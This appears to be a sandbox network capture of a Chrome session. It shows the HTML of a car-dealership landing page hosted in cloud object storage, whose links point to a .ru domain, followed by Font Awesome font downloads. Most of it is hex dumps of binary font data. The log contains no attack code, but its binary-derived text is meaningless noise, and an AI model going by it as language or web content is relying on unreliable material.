                                                                          2024-10-29 15:52:39 UTC1369INData Raw: 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 5f 71 79 48 4e 73 4a 54 4f 78 36 71 36 53 57 58 6f 4f 43 5a 63 77 48 61 45 4b 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 34 20 66 77 2d 62 6f 6c 64 22 3e 44 69 73 63 6f 76 65 72 20 59 6f 75 72 20 4e 65 78 74 20 43 61 72 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 4c 69 66 65 20 69 73 20 61 20 6a 6f 75 72 6e 65 79 3b 20 6d 61 6b 65 20 69 74 20 6d 65 6d 6f 72 61 62 6c 65 20 69
                                                                          Data Ascii: ing.com/th/id/OIP._qyHNsJTOx6q6SWXoOCZcwHaEK') no-repeat center; background-size: cover;"> <div class="container py-5"> <h1 class="display-4 fw-bold">Discover Your Next Car</h1> <p class="lead">Life is a journey; make it memorable i
                                                                          2024-10-29 15:52:39 UTC1369INData Raw: 2d 69 6d 67 2d 74 6f 70 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 61 72 64 2d 62 6f 64 79 20 74 65 78 74 2d 63 65 6e 74 65 72 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 78 65 6c 6b 69 72 63 68 68 6f 66 66 68 2e 72 75 2f 2f 23 69 6e 76 65 6e 74 6f 72 79 27 20 63 6c 61 73 73 3d 27 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 73 6d 27 3e 3c 69 20 63 6c 61 73 73 3d 27 66 61 73 20 66 61 2d 69 6e 66 6f 2d 63 69 72 63 6c 65 27 3e 3c 2f 69 3e 20 56 69 65 77 20 44 65 74 61 69 6c 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: -img-top'> <div class='card-body text-center'> <a href='https://axelkirchhoffh.ru//#inventory' class='btn btn-primary btn-sm'><i class='fas fa-info-circle'></i> View Details</a>
                                                                          2024-10-29 15:52:39 UTC1369INData Raw: 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 73 65 72 76 69 63 65 73 22 20 63 6c 61 73 73 3d 22 70 79 2d 35 20 74 65 78 74 2d 77 68 69 74 65 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 20 64 69 73 70 6c 61 79 2d 36 20 66 77 2d 62 6f 6c 64 20 6d 62 2d 34 22 3e 4f 75 72 20 53 65 72 76 69 63 65 73 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                          Data Ascii: </div></div><div id="services" class="py-5 text-white" style="background-color: #333;"> <div class="container"> <h2 class="text-center display-6 fw-bold mb-4">Our Services</h2> <div class="row text-center"> <div
                                                                          2024-10-29 15:52:39 UTC1369INData Raw: 6d 65 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74
                                                                          Data Ascii: me" required> </div> <div class="col-md-6"> <input type="email" class="form-control" placeholder="Email" required> </div> <div class="col-12"> <textarea class="form-cont
                                                                          2024-10-29 15:52:39 UTC223INData Raw: 62 66 62 66 62 31 66 37 61 62 61 63 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 6c 69 67 68 74 20 6d 78 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 65 6e 76 65 6c 6f 70 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                          Data Ascii: bfbfb1f7abac" class="text-light mx-2"><i class="fas fa-envelope"></i></a></div></footer><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body></html>
                                                                          2024-10-29 15:52:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.1649280104.17.24.144436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:43 UTC699OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:51:43 UTC983INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:51:43 GMT
                                                                          Content-Type: application/octet-stream; charset=utf-8
                                                                          Content-Length: 156532
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: "656632a7-26374"
                                                                          Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 427420
                                                                          Expires: Sun, 19 Oct 2025 15:51:43 GMT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=76fGdii2EOqAZnKShjLwBm3X8moC%2BFmZyPayBbF%2F54U55w4aSbsFSqoImvI7aQn9trh6ljxiYZFCpHWCkRB5JUQre7ez30cVU2%2BlA%2FnW8%2Bxe5fAiMIJb%2BIpkWdkt7JNoydv9t0xb"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da4541e8afa4858-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:51:43 UTC386INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 74 00 0a 00 00 00 06 1a 41 00 02 63 28 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 5c cb ab 40 05 87 6d 07 20 25 20 0d 93 95 01 50 58 9d 00 00 e8 fa 36 1e 46 a4 68 f6 f0 14 91 b3 5e 0f 80 aa aa aa aa aa 66 25 04 1c d7 b6 bd aa 2a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe f4 17 7f f5 37 7f f7 0f ff f4 2f ff f6 1f ff f5 3f ff f7 9f 02 83 71 f7 0f 84 69 d9 8e cb ed f1 fa fc 86 ff 68 bf d7 73 27 40 b4 49 0a c2 f3 44 95 15 ca 56 d5 46 d8 29 28 56 b2 8a 60 fd 37 aa 42 07 df a7 f1 1f 75 e9 b3 ec 0b 00 4a a7 f3 fb 49 19 55 9c 80 39 45 de 11 60 4d b7 8e cd 5a 66 95 d1 c8 ff a9 98 52 0e 26 9a 74 26 26 d2 6a 8b 8a f9 cb 2d a2 95 24 d3 17 c0 22 3b a8 3a
                                                                          Data Ascii: wOF2ctAc(6$ `<\@m % PX6Fh^f%*~W7/?qihs'@IDVF)(V`7BuJIU9E`MZfR&t&&j-$";:
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: a4 40 65 6b 81 03 5e 20 c5 8d 55 c2 bf 25 8a 17 e1 93 b8 a8 45 20 f7 7f 09 70 7a 26 f8 13 4d ad be 5e 35 54 57 77 41 63 95 64 d9 96 ac b6 ba 1d 43 ac b2 a4 ee 84 95 8c e7 36 59 cc cd 12 79 89 b3 9c 65 dd 0c 2f 66 8e 50 0b c4 3a e2 1c b1 76 f7 00 ff 5f 42 e9 88 b4 d4 ba 7a 42 4f 4f cf f4 84 84 b0 00 06 98 05 66 37 63 76 16 98 bd db 3b de 5c de cb 60 3a ee 31 88 20 8f 62 48 5a 89 e2 91 22 45 11 54 24 45 85 35 69 45 cb 14 14 79 14 65 f9 94 29 d1 22 a1 10 6d cb f7 a6 43 7a 7b 9d f2 59 72 90 1c b0 ff 3f 69 6a fd bb af c2 ab 57 e1 55 48 08 0d a0 80 02 50 40 77 a3 1b d5 68 a0 3a b0 c9 22 d9 14 49 2b b0 ad 44 52 92 2d 28 51 94 e5 00 af 34 72 a0 03 e4 28 c9 bb 52 3b 48 43 67 38 d3 61 77 7b c6 49 b6 bc 63 38 c5 c3 99 2c 7b f7 7f 4c 96 35 89 93 82 aa 8f c8 52 ad ab
                                                                          Data Ascii: @ek^ U%E pz&M^5TWwAcdC6Yye/fP:v_BzBOOf7cv;\`:1 bHZ"ET$E5iEye)"mCz{Yr?ijWUHP@wh:"I+DR-(Q4r(R;HCg8aw{Ic8,{L5R
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: c7 ec 30 a8 f8 bd b6 e6 f6 fb a4 c1 88 e9 33 59 ee 8b 7f cf 02 d3 43 9f b9 c6 d3 ca 8e d9 e7 d7 2d 3f 23 1b 04 ff aa 75 23 bb fa 69 5c 0b cf 77 f5 69 69 7c 4b c9 8e d6 75 ee 1c 67 63 5f 25 fa a9 be d9 e8 3e 35 3e cb ac d9 b3 c0 54 d9 b6 1c b3 d8 37 c1 33 02 7b 3f 13 ae c8 b7 75 89 75 b6 a5 ab ee 87 19 53 a6 8f ea d1 dd 9b 33 bd ef 8b c3 06 fc 41 e5 d1 b5 05 c8 91 77 bf b7 ca 19 18 6a 41 bc 07 23 b9 b3 64 ce 9d 85 ac 8e 06 dd 2c 8f 9f 9c ec ca 6d 7e b7 1a e7 69 03 bd d6 c0 0f 93 67 2a 98 36 5b 3d de 45 aa d9 e4 77 44 ff 52 ce a2 f6 b3 b7 a7 5d e6 eb 59 9b ab 26 f5 9e e1 d0 65 6b 78 71 6d 94 fa 52 f8 7b 3b e6 e3 71 52 a7 cc 87 96 ab a9 6f 23 be fd 59 d5 3c f6 fe 33 3e 49 cd 2b e5 5b 8f 13 6a 6a fc 5c a8 9a cd 79 34 03 b7 7f 81 e3 a0 47 2b 78 c5 ba 0d 9c c5
                                                                          Data Ascii: 03YC-?#u#i\wii|Kugc_%>5>T73{?uuS3AwjA#d,m~ig*6[=EwDR]Y&ekxqmR{;qRo#Y<3>I+[jj\y4G+x
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: ce 7e b4 9f ed 0f fb d3 fe b6 ff 62 77 c2 fd e1 d5 b0 3a 7c 16 fe 0e ff 10 f4 e8 33 60 26 73 59 4a cd 28 2d 43 d6 62 1d d6 63 7d b6 60 4b b6 a7 63 47 0e e1 50 0e e3 70 8e e0 48 8e e7 04 56 71 31 97 70 39 57 72 15 57 73 0d d7 72 1d 37 71 2b 77 70 17 f7 f3 00 0f f2 10 0f f3 08 8f f2 18 8f f3 04 4f f2 14 2f f2 0e ef f2 31 9f f0 29 5f f0 25 5f f1 3b 7f f1 af 40 94 04 12 91 44 49 92 64 49 91 74 c9 94 2c c9 96 1c c9 95 3c 29 15 23 0d a5 b3 74 95 6e d2 43 fa 4a 3f e9 2f 03 65 9c 6c 91 ad b2 ad b2 49 65 d3 da a9 b5 8b 6b 97 d4 8e d5 ee 55 13 57 83 87 e8 26 8e 29 6d 06 98 09 66 91 59 62 36 9b 6d 66 9f 39 68 8e 9a 9b e6 91 79 69 9c e4 96 62 52 4a ea 48 5b e9 2c dd 65 a8 8c 97 99 b2 54 36 c9 2e 39 26 e7 e4 92 dc 95 fb f2 50 3e ca 17 f9 2e ff 6d 64 9b c6 66 b7 c5 ed
                                                                          Data Ascii: ~bw:|3`&sYJ(-Cbc}`KcGPpHVq1p9WrWsr7q+wpO/1)_%_;@DIdIt,<)#tnCJ?/elIekUW&)mfYb6mf9hyibRJH[,eT6.9&P>.mdf
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 21 f4 99 c2 39 05 e7 e7 02 5c 84 8b 72 49 2e c5 55 b8 2a 2f e3 4d bc 9d f7 f2 31 3e c9 67 f9 12 df e2 07 fc 98 a9 1f e7 16 79 ec d9 25 8f 14 94 52 52 6e 55 cd a4 b5 74 90 ae d2 5d fa b0 a1 d1 32 4e 26 c9 14 99 25 2b 65 b5 6c 66 fc e4 dc ae 6d f5 41 42 b6 fc 29 6a 6f f2 1f f1 90 10 c9 e7 cc 8d 7c 28 88 72 5f a6 09 5a a2 2d 3a a2 0f fa 61 10 86 62 3c 26 63 1a 66 62 3e 96 b1 f1 9b b0 15 db b1 07 07 70 02 67 70 01 97 70 15 d7 71 07 f7 d9 ea 15 02 3d b3 5b b8 8b ea 62 f4 13 b9 a4 2e c5 bc f1 50 bc 3f f5 e7 ec 9f f3 e6 72 fc ef 6a fe 7f f8 ff 83 ff ef fc 7f e3 ff 6b f8 63 13 a6 40 e9 02 45 0b 14 8c df e2 fd 78 31 1e 8f c7 e2 8e b8 2d 6e 8d 9b e3 06 20 2e 8c b3 e3 8c 58 29 96 8e 25 62 9e 98 2e a6 f4 ff fd b3 bf f6 47 7e c3 cf f8 69 3f e0 3b 7d 9b 6f f2 8d be c1
                                                                          Data Ascii: !9\rI.U*/M1>gy%RRnUt]2N&%+elfmAB)jo|(r_Z-:ab<&cfb>pgppq=[b.P?rjkc@Ex1-n .X)%b.G~i?;}o
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: dc d5 6a 1b 73 8c cb b4 11 80 0d 0b b3 00 e3 43 7b f1 70 cf 22 0c 69 bf 79 6f 57 77 e9 2e 1c f2 43 a6 3f 5b 5a 83 b3 6a 52 78 3a 5a 87 7a 1c ff c4 b4 e3 c0 8e 01 3b 04 6c 2f 3c 4a df c3 15 dc 41 69 f5 e4 af 6b 43 38 89 8c 1a 34 a6 09 4d 69 46 73 5a d0 92 56 b4 a6 0d 6d 69 47 7b 3a d0 91 12 65 aa c8 a9 a6 42 50 d0 89 ce 74 a1 2b dd e8 4e 0f 7a 72 2d f7 d8 e5 76 85 5d 69 d7 d9 f5 76 93 dd 62 b7 da 5d 76 9f 3d 61 4f da 53 f6 96 bd 6f 1f d8 87 f6 91 7d 6c 9f d8 a7 f6 b9 7d 61 5f da 37 f6 ad 7d 67 3f d9 cf f6 8b fd 6a 7f da 0c 9b 63 8b 6c b1 ad b2 d5 42 35 d5 5c 2d d5 56 b9 ba ab 87 7a a9 bf 06 68 a0 86 6a b8 c6 6a 9c c6 6b 92 26 6b 8a a6 6a 5b 6d a7 1d b4 93 76 d5 b1 3a 59 a7 ea 0c 9d ad 0b 74 a1 2e d2 c5 ba 44 97 ea 32 5d ae eb 74 bd 6e d3 ed ba 57 8f e8 49
                                                                          Data Ascii: jsC{p"iyoWw.C?[ZjRx:Zz;l/<JAikC84MiFsZVmiG{:eBPt+Nzr-v]ivb]v=aOSo}l}a_7}g?jclB5\-Vzhjjk&kj[mv:Yt.D2]tnWI
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: a4 9f 56 d7 4b 08 3b 50 af 05 3b 52 6f 0d 3b 51 ef 08 3b 53 ef 0a bb 50 1f bc 1c bb 52 1f 43 7d 6c ff ab ae 4f 77 39 f6 a0 be 88 fa e2 3e 57 5d df 20 ec 4d 7d 07 ec 43 fd 08 ec 4b fd 0c ec 47 fd 02 ec 4f fd 36 1c 40 fd 2e 1c 48 fd 3e 1c 44 fd 3d 1c 4c fd 33 1c 42 fd 1b 1c 4a fd 1f 1c 46 6f f0 08 0e a7 37 15 bd a9 71 04 bd 59 81 a3 e8 2d 0a 47 d3 3b 11 8e a1 77 09 1c 4b ef 7e 38 8e de c3 70 3c bd 67 e1 04 7a 2f 8d e0 44 7a af d2 7b 0d 27 d1 fb 02 38 85 de b7 70 2a 7d 93 c3 69 f4 dd 3e 82 d3 e9 bb 93 be bb 70 06 7d bf 02 67 d1 2c 02 67 d3 2c 3b 82 73 68 96 a7 59 01 e7 d2 ec 02 9c 4f b3 f7 57 74 01 cd 7e 34 fb e3 42 9a 83 68 0e c6 c5 34 67 00 97 d2 9c 03 97 d1 5c fb 15 5d 4e 73 03 cd ad b8 82 e6 76 9a 3b 70 1d cd dd 2c c7 0d 34 f7 d2 bc d2 cf fd 89 9a d7 68
                                                                          Data Ascii: VK;P;Ro;Q;SPRC}lOw9>W] M}CKGO6@.H>D=L3BJFo7qY-G;wK~8p<gz/Dz{'8p*}i>p}g,g,;shYOWt~4Bh4g\]Nsv;p,4h
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: ca ba 94 0d fa 07 79 d9 e8 25 b1 36 65 d3 88 58 87 b2 39 65 0b 62 5d ca 61 48 37 37 e5 f0 88 6e 1e ca d1 94 63 88 f5 29 a7 22 b1 21 e5 aa 82 d8 88 f2 30 e5 91 f1 58 5e 1e 53 62 53 ca 53 12 9b 51 9e 8b 88 cd 29 2f 51 5e 21 b6 a0 bc 86 c4 d6 94 8f 24 b6 a1 7c 2a b1 2d e5 2b 89 ed 28 3f 45 c4 f6 94 bf 28 7f 13 3b 50 fe 45 fa 33 29 ff 4b ec 44 1d 24 b1 33 75 54 89 5d a8 93 4b ec 4a 9d 52 62 37 ea 54 05 31 15 75 76 ea 9c 4f e7 f2 3a b7 05 b1 17 75 3e ea fc cf e0 f2 ba a0 12 fb 52 17 91 d8 8f ba 98 c4 fe d4 25 24 0e a0 2e 25 71 20 75 19 89 83 a8 2b 48 1c 4c 5d 59 e2 10 ea aa 12 87 52 d7 90 38 8c ba 6e 41 1c 4e dd 90 ba d1 b8 37 af 9b 18 11 47 51 37 a3 6e 4e 1c 4d dd 9a 92 71 2c 75 5b ea 4e c4 71 d4 5d a9 bb 13 a7 50 f7 24 22 4e a7 ee 43 dd 8f 38 83 7a 10 05 dd
                                                                          Data Ascii: y%6eX9eb]aH77nc)"!0X^SbSSQ)/Q^!$|*-+(?E(;PE3)KD$3uT]KJRb7T1uvO:u>R%$.%q u+HL]YR8nAN7GQ7nNMq,u[Nq]P$"NC8z
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 89 98 f2 28 d4 26 e6 7c 14 1a 13 db 11 85 16 c4 65 14 5a 12 57 a0 d0 9a 78 8f 42 1b e2 4b a0 d0 9e f8 51 28 74 26 f6 01 14 ba 10 73 0b 0a 3d 88 1f 87 c2 58 a2 7f 50 98 40 dc 01 14 26 7a 3c ac 92 f8 d1 28 ac 21 ae 1e 0a db 88 ed 87 c2 4e 62 1f 47 61 17 71 dd 50 38 9c e8 63 14 8e 20 e6 55 14 ce 24 e6 4a 14 ce 25 f6 3e 14 ce 27 76 09 0a 97 10 9d 84 c2 a5 c4 ec 40 e1 5a a2 cb 51 b8 8e d8 3f 51 b8 99 b8 f3 51 b8 83 d8 4f 51 b8 9b e8 58 14 1e 23 76 1b 0a 8f 13 33 0b 85 27 88 ef 8c c2 93 c4 7d 87 c2 d3 c4 cd 46 e1 19 a2 bf 50 78 8e d8 83 28 bc 40 dc 36 14 5e 26 e6 13 14 5e 23 f6 68 14 de 24 f6 28 14 de 22 ee 2b 14 de 21 6e 37 0a ef 13 77 39 0a 1f 12 77 3b 0a 9f 11 9d 8b c2 17 c4 5c 83 c2 d7 c4 f4 47 e1 3b e2 c6 a1 f0 23 71 06 85 48 74 19 0a 87 88 ae 45 d1 11 f7
                                                                          Data Ascii: (&|eZWxBKQ(t&s=XP@&z<(!NbGaqP8c U$J%>'v@ZQ?QQOQX#v3'}FPx(@6^&^#h$("+!n7w9w;\G;#qHtE
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 1f 22 37 46 cc ef c8 8d 13 76 42 6e 92 f8 e3 68 f4 34 e2 9f 8b 46 4f 27 de 2c 34 7a 39 31 6f a0 d1 1b 89 f1 d1 e8 33 c4 ff 19 8d ae fd 4f 8a b9 98 12 4c b5 b5 5c 6d ca 44 24 6c c8 30 e4 79 90 d7 b3 9e b4 d1 d7 a8 67 41 9e d6 d3 9e 2c c8 fb 1a 7d 69 96 0f 34 f3 2c 6b e6 9b 67 b5 b4 96 f6 64 e5 a0 1c 6c 9e 0d d6 07 eb 3d 0b 5b ad 56 ab fe e4 93 4f b6 46 96 8f 8c 8c 8c 34 9e 7c f2 c9 91 d6 e4 0f 8a e2 44 9b 25 71 24 45 71 32 f9 55 12 47 9a 5d 14 45 31 f9 df ec a2 68 17 45 a1 ce a2 5d 14 dd 49 1c 49 51 9c 4c 1e 92 c4 91 14 c5 89 6e 03 f0 a6 fe 9d fa 8a 9d 75 1b 55 b6 80 e9 33 ea 59 36 d8 b7 45 50 ae f6 64 49 5a 6b 0c e5 cd e1 1e bf 99 37 eb 83 f5 72 50 4e 6b e9 c2 30 8c e3 30 0c c3 38 0e c3 cd d2 ce 4a a5 33 4d 3b 2b 95 ce 54 cb e3 30 0c c3 78 8a 38 0c c3 30
                                                                          Data Ascii: "7FvBnh4FO',4z91o3OL\mD$l0ygA,}i4,kgdl=[VOF4|D%q$Eq2UG]E1hE]IIQLnuU3Y6EPdIZk7rPNk008J3M;+T0x80


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.1649282104.17.24.144436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:43 UTC700OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:51:43 UTC973INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:51:43 GMT
                                                                          Content-Type: application/octet-stream; charset=utf-8
                                                                          Content-Length: 116672
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: "656632a7-1c7c0"
                                                                          Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 337441
                                                                          Expires: Sun, 19 Oct 2025 15:51:43 GMT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nhwip7J6VsCAz9RoJlUVmwqbkY2A8W1B4lCKn0ziTBpuBrJ4fjr4R3sYmD6qjTFNNJEpRz8hfKs8xEdoJmh48XLYaFyRmTo2QwedYDLy7Py7BoHBSG%2Bm6QixXUeIqPeRMHAm21WE"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da454203d992d33-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:51:43 UTC396INData Raw: 77 4f 46 32 00 01 00 00 00 01 c7 c0 00 0a 00 00 00 03 0e 91 00 01 c7 73 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 48 00 a5 56 ca 8b cc 10 cb 90 4c 05 88 1d 07 20 25 48 87 71 6a 08 dd 30 3d 00 00 b4 fa 79 50 46 f4 a4 d5 e2 01 50 55 55 4f 09 61 5e db f6 2a 20 fc f4 cb 6f 7f fc e5 6f ff f8 d7 7f fe f7 97 81 b1 3b 20 96 ed b8 9e 6f f8 ff 7e bf d7 75 f6 7f 2f c0 ec 62 93 f6 96 59 d6 75 2a e3 4b b7 a0 aa be 90 11 32 aa 80 77 fc 1f 5f 09 e8 82 70 96 d8 b4 ac 9d e8 31 d1 6e 2f a2 ce 8b 98 d3 09 2f 46 92 a3 74 f6 e5 01 e4 4f ec 65 2e d2 89 3a 81 e8 d4 dd b9 c9 3f 01 9e a7 9c e6 fb ce c6 aa bc 96 42 b2 55 e0 80 0a 34 01 a9 84 47 22 bb 40 37 e0 1b 91 4a c0 49 f6 54 5a 42 9e 91 c7 cb ff 87 33 fd 9f 3b a0 11
                                                                          Data Ascii: wOF2s6$ `HVL %Hqj0=yPFPUUOa^* oo; o~u/bYu*K2w_p1n//FtOe.:?BU4G"@7JITZB3;
